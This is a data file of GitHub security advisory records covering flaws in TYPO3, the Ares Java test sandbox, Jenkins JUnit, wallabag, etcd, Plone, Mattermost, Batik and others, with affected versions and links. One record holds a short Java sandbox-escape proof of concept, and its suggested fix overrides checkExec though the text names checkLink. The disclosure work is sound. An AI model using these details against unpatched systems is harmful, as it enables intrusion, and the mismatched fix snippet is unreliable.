{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-22T19:16:30Z', 'nvd_published_at': '2023-02-22T09:15:00Z'}
|
1.4.0
|
GHSA-r4f8-f93x-5qh3
|
2023-02-16T19:07:25Z
|
2023-02-08T21:33:24Z
| null |
['CVE-2023-24814']
|
TYPO3 is vulnerable to Cross-Site Scripting via frontend rendering
|
> ### CVSS: `CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:L/E:F/RL:O/RC:C` (8.2)
### Problem
TYPO3 core component `GeneralUtility::getIndpEnv()` uses the unfiltered server environment variable `PATH_INFO`, which allows attackers to inject malicious content.
In combination with the TypoScript setting [`config.absRefPrefix=auto`](https://github.com/TYPO3/typo3/blob/v11.5.22/typo3/sysext/frontend/Classes/Controller/TypoScriptFrontendController.php#L2547-L2549), attackers can inject malicious HTML code into pages that have not yet been rendered and cached. As a result, injected values would be cached and delivered to other website visitors (persisted cross-site scripting).
Individual code which relies on the resolved value of [`GeneralUtility::getIndpEnv('SCRIPT_NAME')`](https://github.com/TYPO3/typo3/blob/v11.5.22/typo3/sysext/core/Classes/Utility/GeneralUtility.php#L2481-L2484) and corresponding usages (as shown below) are vulnerable as well.
- `GeneralUtility::getIndpEnv('PATH_INFO') `
- `GeneralUtility::getIndpEnv('SCRIPT_NAME') `
- `GeneralUtility::getIndpEnv('TYPO3_REQUEST_DIR')`
- `GeneralUtility::getIndpEnv('TYPO3_REQUEST_SCRIPT')`
- `GeneralUtility::getIndpEnv('TYPO3_SITE_PATH')`
- `GeneralUtility::getIndpEnv('TYPO3_SITE_SCRIPT')`
- `GeneralUtility::getIndpEnv('TYPO3_SITE_URL')`
Installations of TYPO3 versions 8.7 and 9.x are probably only affected when server environment variable [`TYPO3_PATH_ROOT`](https://docs.typo3.org/m/typo3/reference-coreapi/9.5/en-us/ApiOverview/Environment/Index.html#configuring-environment-paths) is defined - which is the case if they were installed via Composer.
Additional investigations confirmed that Apache and Microsoft IIS web servers using PHP-CGI (FPM, FCGI/FastCGI, or similar) are affected. There might be the risk that nginx is vulnerable as well. It was not possible to exploit Apache/mod_php scenarios.
### Solution
The usage of server environment variable `PATH_INFO` has been removed from corresponding processings in `GeneralUtility::getIndpEnv()`. Besides that, the public property `TypoScriptFrontendController::$absRefPrefix` is encoded for both being used as a URI component and for being used as a prefix in an HTML context. This mitigates the cross-site scripting vulnerability.
Update to TYPO3 versions 8.7.51 ELTS, 9.5.40 ELTS, 10.4.36 LTS, 11.5.23 LTS and 12.2.0 that fix the problem described above.
> ℹ️ **Strong security defaults - Manual actions required**
> Any web server using PHP-CGI (FPM, FCGI/FastCGI, or similar) needs to ensure that the PHP setting [**`cgi.fix_pathinfo=1`**](https://www.php.net/manual/en/ini.core.php#ini.cgi.fix-pathinfo) is used, which is the default PHP setting. In case this setting is not enabled, an exception is thrown to avoid continuing with invalid path information.
For websites that cannot be patched timely the TypoScript setting [`config.absRefPrefix`](https://docs.typo3.org/m/typo3/reference-typoscript/main/en-us/Setup/Config/Index.html#absrefprefix) at least should be set to a static path value, instead of using `auto` - e.g. `config.absRefPrefix=/` - this **does not fix all aspects of the vulnerability**, and is just considered to be an intermediate mitigation to the most prominent manifestation.
### References
* [TYPO3-CORE-SA-2023-001](https://typo3.org/security/advisory/typo3-core-sa-2023-001)
* [TYPO3-CORE-PSA-2023-001](https://typo3.org/security/advisory/typo3-psa-2023-001) *pre-announcement*
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:L'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '12.0.0'}, {'fixed': '12.2.0'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '11.0.0'}, {'fixed': '11.5.23'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '10.0.0'}, {'fixed': '10.4.36'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.0.0'}, {'fixed': '9.5.40'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.7.0'}, {'fixed': '8.7.51'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '10.0.0'}, {'fixed': '10.4.35'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '11.0.0'}, {'fixed': '11.5.23'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '12.0.0'}, {'fixed': '12.2.0'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/TYPO3/typo3/security/advisories/GHSA-r4f8-f93x-5qh3'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-24814'}, {'type': 'WEB', 'url': 'https://github.com/TYPO3/typo3/commit/0005a6fd86ab97eff8bf2e3a5828bf0e7cb6263a'}, {'type': 'WEB', 'url': 'https://docs.typo3.org/m/typo3/reference-typoscript/main/en-us/Setup/Config/Index.html#absrefprefix'}, {'type': 'WEB', 'url': 'https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms/CVE-2023-24814.yaml'}, {'type': 'PACKAGE', 'url': 'https://github.com/TYPO3/typo3'}, {'type': 'WEB', 'url': 'https://github.com/TYPO3/typo3/blob/v11.5.22/typo3/sysext/core/Classes/Utility/GeneralUtility.php#L2481-L2484'}, {'type': 'WEB', 'url': 'https://github.com/TYPO3/typo3/blob/v11.5.22/typo3/sysext/frontend/Classes/Controller/TypoScriptFrontendController.php#L2547-L2549'}, {'type': 'WEB', 'url': 'https://typo3.org/security/advisory/typo3-core-sa-2023-001'}, {'type': 'WEB', 'url': 'https://typo3.org/security/advisory/typo3-psa-2023-001'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-08T21:33:24Z', 'nvd_published_at': '2023-02-07T19:15:00Z'}
|
1.4.0
|
GHSA-98hq-4wmw-98w9
|
2023-02-10T23:52:13Z
|
2023-02-10T23:52:13Z
| null |
[]
|
Arbitrary code execution in de.tum.in.ase:artemis-java-test-sandbox
|
### Summary
Because of the missing `checkLink(String)` override in the SecurityManager, students can load libraries and execute arbitrary code.
### Details
Using `System.load(String)` or `System.loadLibrary(String)` students can load and execute arbitrary code.
```java
private static native void start(List<String> args);
public static void main(String[] args) {
System.load(new File("path_to_lib.so").getAbsolutePath());
start(List.of(args));
}
```
Adding this to the security manager (and a translation) should fix the issue:
```java
@Override
public void checkExec(String cmd) {
try {
if (enterPublicInterface())
return;
throw new SecurityException(localized("security.error_link")); //$NON-NLS-1$
} finally {
exitPublicInterface();
}
}
```
### PoC
See details.
### Impact
Arbitrary code execution.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'de.tum.in.ase:artemis-java-test-sandbox'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.2'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/ls1intum/Ares/security/advisories/GHSA-98hq-4wmw-98w9'}, {'type': 'PACKAGE', 'url': 'https://github.com/ls1intum/Ares'}]
|
{'cwe_ids': ['CWE-284'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-10T23:52:13Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-ph74-8rgx-64c5
|
2023-02-23T21:31:42Z
|
2023-02-15T15:30:41Z
| null |
['CVE-2023-25761']
|
Cross-site Scripting in Jenkins JUnit Plugin
|
Jenkins JUnit Plugin 1166.va_436e268e972 and earlier does not escape test case class names in JavaScript expressions, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to control test case class names in the JUnit resources processed by the plugin.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:junit'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1166.va'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25761'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-02-15/#SECURITY-3032'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/02/15/4'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-15T18:24:22Z', 'nvd_published_at': '2023-02-15T14:15:00Z'}
|
1.4.0
|
GHSA-mrqx-mjc4-vfh3
|
2023-02-02T19:27:16Z
|
2023-02-02T19:26:47Z
| null |
['CVE-2023-0610']
|
wallabag subject to Improper Authorization via annotations
|
### Impact
The annotations feature lets users add annotations on highlighted parts of an entry.
The controller does not validate authorization on `PUT` and `DELETE` requests which lets a logged user modify or delete any annotation using their ID on their endpoints `example.org/annotations/{id}`.
These vulnerable requests also disclose highlighted parts of the entry to the attacker.
You should immediately patch your instance to version 2.5.3 or higher if you have more than one user and/or having open registration.
### Resolution
A user check is now done in the vulnerable methods before applying change on an annotation.
The Annotation retrieval through a `ParamConverter` has also been replaced with a call to the `AnnotationRepository` in order to prevent any information disclosure through response discrepancy.
### Workarounds
### Credits
We would like to thank @bAuh0lz for reporting this issue through huntr.dev.
Reference: https://huntr.dev/bounties/8fdd9b31-d89b-4bbe-9557-20b960faf926/
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'wallabag/wallabag'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0-beta.1'}, {'fixed': '2.5.3'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/wallabag/wallabag/security/advisories/GHSA-mrqx-mjc4-vfh3'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0610'}, {'type': 'WEB', 'url': 'https://github.com/wallabag/wallabag/commit/5ac6b6bff9e2e3a87fd88c2904ff3c6aac40722e'}, {'type': 'PACKAGE', 'url': 'https://github.com/wallabag/wallabag'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/8fdd9b31-d89b-4bbe-9557-20b960faf926'}]
|
{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-02T19:26:47Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-p4g4-wgrh-qrg2
|
2023-06-13T23:48:33Z
|
2023-02-07T22:59:30Z
| null |
['CVE-2020-15106']
|
Panic due to malformed WALs in go.etcd.io/etcd
|
### Vulnerability type
Data Validation
### Detail
The size of a record is stored in the length field of a WAL file and no additional validation is done on this data. Therefore, it is possible to forge an extremely large frame size that can unintentionally panic at the expense of any RAFT participant trying to decode the WAL.
### References
Find out more on this vulnerability in the [security audit report](https://github.com/etcd-io/etcd/blob/master/security/SECURITY_AUDIT.pdf)
### For more information
If you have any questions or comments about this advisory:
* Contact the [etcd security committee](https://github.com/etcd-io/etcd/blob/master/security/security-release-process.md#product-security-committee-psc)
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'github.com/etcd-io/etcd/wal'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.4.10'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'go.etcd.io/etcd'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.5.0-alpha.5.0.20200423152442-f4b650b51dc4'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/etcd-io/etcd/security/advisories/GHSA-p4g4-wgrh-qrg2'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15106'}, {'type': 'WEB', 'url': 'https://github.com/etcd-io/etcd/pull/11793'}, {'type': 'WEB', 'url': 'https://github.com/etcd-io/etcd/commit/4571e528f49625d3de3170f219a45c3b3d38c675'}, {'type': 'WEB', 'url': 'https://github.com/etcd-io/etcd/commit/f4b650b51dc4a53a8700700dc12e1242ac56ba07'}, {'type': 'PACKAGE', 'url': 'https://github.com/etcd-io/etcd'}, {'type': 'WEB', 'url': 'https://github.com/etcd-io/etcd/blob/master/security/SECURITY_AUDIT.pdf'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/L6B6R43Y7M3DCHWK3L3UVGE2K6WWECMP/'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2020-0005'}]
|
{'cwe_ids': ['CWE-20'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-02-07T22:59:30Z', 'nvd_published_at': '2020-08-05T19:15:00Z'}
|
1.4.0
|
GHSA-47p5-p3jw-w78w
|
2023-03-03T00:02:15Z
|
2023-02-17T18:30:23Z
| null |
['CVE-2021-33926']
|
Server-Side Request Forgery in Plone CMS
|
An issue in Plone CMS allows attacker to access sensitive information via the RSS feed protlet.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'PyPI', 'name': 'Plone'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.3'}, {'fixed': '5.2.5'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-33926'}, {'type': 'PACKAGE', 'url': 'https://github.com/plone/Plone'}, {'type': 'WEB', 'url': 'https://github.com/s-kustm/Subodh/blob/master/Plone%205.2.4%20Vulnerable%20to%20bilend%20SSRF.pdf'}, {'type': 'WEB', 'url': 'https://plone.org/security/hotfix/20210518'}, {'type': 'WEB', 'url': 'https://plone.org/security/hotfix/20210518/blind-ssrf-via-feedparser-accessing-an-internal-url'}]
|
{'cwe_ids': ['CWE-918'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-17T20:50:53Z', 'nvd_published_at': '2023-02-17T18:15:00Z'}
|
1.4.0
|
GHSA-r2h5-3hgw-8j34
|
2023-02-17T20:51:24Z
|
2023-02-17T20:51:24Z
| null |
[]
|
User data in TPM attestation vulnerable to MITM
|
### Impact
Attestation *user data* (such as the digest of the public key in an aTLS connection) was bound to the issuer's TPM, but not to its PCR state. An attacker could intercept a node initialization, initialize the node themselves, and then impersonate an uninitialized node to the validator. In practice, this meant that a CSP insider with sufficient privileges would have been able to join a node under their control to a Constellation cluster.
### Patches
The issue has been patched in [v2.5.2](https://github.com/edgelesssys/constellation/releases/tag/v2.5.2).
### Workarounds
none
|
[]
|
[{'package': {'ecosystem': 'Go', 'name': 'github.com/edgelesssys/constellation/v2'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.5.2'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.5.1'}}]
|
[{'type': 'WEB', 'url': 'https://github.com/edgelesssys/constellation/security/advisories/GHSA-r2h5-3hgw-8j34'}, {'type': 'PACKAGE', 'url': 'https://github.com/edgelesssys/constellation'}, {'type': 'WEB', 'url': 'https://github.com/edgelesssys/constellation/releases/tag/v2.5.2'}]
|
{'cwe_ids': ['CWE-200'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-17T20:51:24Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-9fh3-j99m-f4v7
|
2023-03-03T23:31:11Z
|
2023-02-24T00:30:17Z
| null |
['CVE-2022-36231']
|
Code injection in pdf_info
|
pdf_info 0.5.3 is vulnerable to Command Execution. An attacker using a specially crafted payload may execute OS commands by using command chaining because during object initalization there is no validation performed and the user provided path is used.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'RubyGems', 'name': 'pdf_info'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.5.3'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-36231'}, {'type': 'WEB', 'url': 'https://github.com/newspaperclub/pdf_info/issues/16'}, {'type': 'WEB', 'url': 'https://github.com/newspaperclub/pdf_info/pull/15'}, {'type': 'WEB', 'url': 'https://github.com/affix/CVE-2022-36231'}, {'type': 'PACKAGE', 'url': 'https://github.com/newspaperclub/pdf_info'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/pdf_info/CVE-2022-36231.yml'}, {'type': 'WEB', 'url': 'https://rubygems.org/gems/pdf_info'}]
|
{'cwe_ids': ['CWE-94'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-02-24T00:33:27Z', 'nvd_published_at': '2023-02-23T22:15:00Z'}
|
1.4.0
|
GHSA-vjxx-jgcx-9fq2
|
2023-03-01T01:48:56Z
|
2023-02-18T03:30:17Z
| null |
['CVE-2023-0901']
|
Pixelfed allows user enumeration via reset password functionality
|
Exposure of Sensitive Information to an Unauthorized Actor in GitHub repository pixelfed/pixelfed 0.11.4 and prior.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'pixelfed/pixelfed'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.11.4'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0901'}, {'type': 'WEB', 'url': 'https://github.com/pixelfed/pixelfed/commit/5b5f5bc38ca9ba39d0b7dacc3813fb899f71ba57'}, {'type': 'PACKAGE', 'url': 'https://github.com/pixelfed/pixelfed'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/0327b1b2-6e7c-4154-a307-15f236571010'}]
|
{'cwe_ids': ['CWE-200'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-22T00:04:32Z', 'nvd_published_at': '2023-02-18T01:15:00Z'}
|
1.4.0
|
GHSA-c2rc-8m9f-g4fh
|
2023-03-06T01:45:11Z
|
2023-02-28T03:30:18Z
| null |
['CVE-2023-1081']
|
Microweber Cross-site Scripting vulnerability
|
Cross-site Scripting (XSS) - Stored in GitHub repository microweber/microweber 1.3.2 and prior. A patch is available and anticipated to be part of version 1.3.3.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'microweber/microweber'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.3.2'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-1081'}, {'type': 'WEB', 'url': 'https://github.com/microweber/microweber/commit/29d418461d8407688f2720e7b4be915e03fc16c1'}, {'type': 'PACKAGE', 'url': 'https://github.com/microweber/microweber'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/cf59deed-9d43-4552-acfd-43f38f3aabba'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-28T23:31:01Z', 'nvd_published_at': '2023-02-28T02:15:00Z'}
|
1.4.0
|
GHSA-crh5-vv2v-c82q
|
2023-02-22T00:09:19Z
|
2023-02-21T00:30:20Z
| null |
['CVE-2021-32850']
|
@claviska/jquery-minicolors vulnerable to Cross-site Scripting
|
jQuery MiniColors is a color picker built on jQuery. Prior to version 2.3.6, jQuery MiniColors is prone to cross-site scripting when handling untrusted color names. This issue is patched in version 2.3.6.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'npm', 'name': '@claviska/jquery-minicolors'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.6'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32850'}, {'type': 'WEB', 'url': 'https://github.com/claviska/jquery-minicolors/commit/ef134824a7f4110ada53ea6c173111a4fa2f48f3'}, {'type': 'WEB', 'url': 'https://codepen.io/webbiesdk/pen/oNBQNNV'}, {'type': 'PACKAGE', 'url': 'https://github.com/claviska/jquery-minicolors'}, {'type': 'WEB', 'url': 'https://github.com/claviska/jquery-minicolors/releases/tag/2.3.6'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MC5HV4ESLV2E23YGHNJ542QEZBH6YE2F/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UDXBWA54A7D6HMR2TN5BAYNCU7HO2PUO/'}, {'type': 'ADVISORY', 'url': 'https://securitylab.github.com/advisories/GHSL-2021-1045_jQuery_MiniColors_Plugin/'}, {'type': 'WEB', 'url': 'https://vuldb.com/?ctiid.215306'}, {'type': 'WEB', 'url': 'https://vuldb.com/?id.215306'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-22T00:09:19Z', 'nvd_published_at': '2023-02-20T22:15:00Z'}
|
1.4.0
|
GHSA-g3vf-47fv-8f3c
|
2023-08-16T21:39:51Z
|
2023-08-11T15:30:46Z
| null |
['CVE-2021-26505']
|
MrSwitch hello.js vulnerable to prototype pollution
|
A prototype pollution vulnerability in MrSwitch hello.js prior to version 1.18.8 allows remote attackers to execute arbitrary code via `hello.utils.extend` function.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'npm', 'name': 'hellojs'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.18.8'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-26505'}, {'type': 'WEB', 'url': 'https://github.com/MrSwitch/hello.js/issues/634'}, {'type': 'WEB', 'url': 'https://github.com/MrSwitch/hello.js/commit/7ab50aeff2d41991f08d4ad6c0481125eea8f6b7'}, {'type': 'PACKAGE', 'url': 'https://github.com/MrSwitch/hello.js'}]
|
{'cwe_ids': ['CWE-1321'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-08-11T22:08:41Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-mq4v-6vg4-796c
|
2023-08-21T19:33:04Z
|
2023-08-11T09:30:36Z
| null |
['CVE-2023-39553']
|
apache-airflow-providers-apache-drill Improper Input Validation vulnerability
|
Improper Input Validation vulnerability in Apache Software Foundation Apache Airflow Drill Provider.
Apache Airflow Drill Provider is affected by a vulnerability that allows an attacker to pass in malicious parameters when establishing a connection with DrillHook giving an opportunity to read files on the Airflow server.
This issue affects Apache Airflow Drill Provider before 2.4.3.
It is recommended to upgrade to a version that is not affected.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]
|
[{'package': {'ecosystem': 'PyPI', 'name': 'apache-airflow-providers-apache-drill'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.3'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-39553'}, {'type': 'WEB', 'url': 'https://github.com/apache/airflow/pull/33074'}, {'type': 'WEB', 'url': 'https://github.com/apache/airflow/commit/394a727ac2c18d58978bf186a7a92923460ec110'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/airflow'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/apache-airflow/PYSEC-2023-136.yaml'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/ozpl0opmob49rkcz8svo8wkxyw1395sf'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/08/11/1'}]
|
{'cwe_ids': ['CWE-20'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-11T22:01:37Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-6xjj-v76v-fwpj
|
2023-08-11T21:56:52Z
|
2023-08-11T09:30:36Z
| null |
['CVE-2023-4107']
|
Mattermost does not validate requesting user permissions before updating admin details
|
Mattermost fails to properly validate the requesting user permissions when updating a system admin, allowing a user manager to update a system admin's details such as email, first name and last name.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:L'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'github.com/mattermost/mattermost-server/v6'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '7.8.8'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.8.7'}}, {'package': {'ecosystem': 'Go', 'name': 'github.com/mattermost/mattermost-server/v6'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.9.0'}, {'fixed': '7.9.6'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.9.5'}}, {'package': {'ecosystem': 'Go', 'name': 'github.com/mattermost/mattermost-server/v6'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.10.0'}, {'fixed': '7.10.4'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.10.3'}}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-4107'}, {'type': 'PACKAGE', 'url': 'https://github.com/mattermost/mattermost'}, {'type': 'WEB', 'url': 'https://mattermost.com/security-updates'}]
|
{'cwe_ids': ['CWE-284', 'CWE-863'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-11T21:56:52Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-gq5f-xv48-2365
|
2023-08-30T12:59:50Z
|
2023-08-22T21:30:26Z
| null |
['CVE-2022-44729']
|
Apache XML Graphics Batik Server-Side Request Forgery vulnerability
|
Server-Side Request Forgery (SSRF) vulnerability in Apache Software Foundation Apache XML Graphics Batik.This issue affects Apache XML Graphics Batik: 1.16.
On version 1.16, a malicious SVG could trigger loading external resources by default, causing resource consumption or in some cases even information disclosure. Users are recommended to upgrade to version 1.17 or later.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.xmlgraphics:batik-bridge'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0'}, {'fixed': '1.17'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.xmlgraphics:batik-svgrasterizer'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0'}, {'fixed': '1.17'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.xmlgraphics:batik-transcoder'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0'}, {'fixed': '1.17'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-44729'}, {'type': 'WEB', 'url': 'https://github.com/apache/xmlgraphics-batik/commit/85b3457d9902f64d5d409a8da060d5ba47d0b69b'}, {'type': 'WEB', 'url': 'https://github.com/apache/xmlgraphics-batik/commit/aaa1dd3e6b5a7df781d73e0c37a1df6a8f318893'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/xmlgraphics-batik'}, {'type': 'WEB', 'url': 'https://issues.apache.org/jira/browse/BATIK-1349'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/hco2nw1typoorz33qzs0fcdx0ws6d6j2'}, {'type': 'WEB', 'url': 'https://xmlgraphics.apache.org/security.html'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/08/22/2'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/08/22/4'}]
|
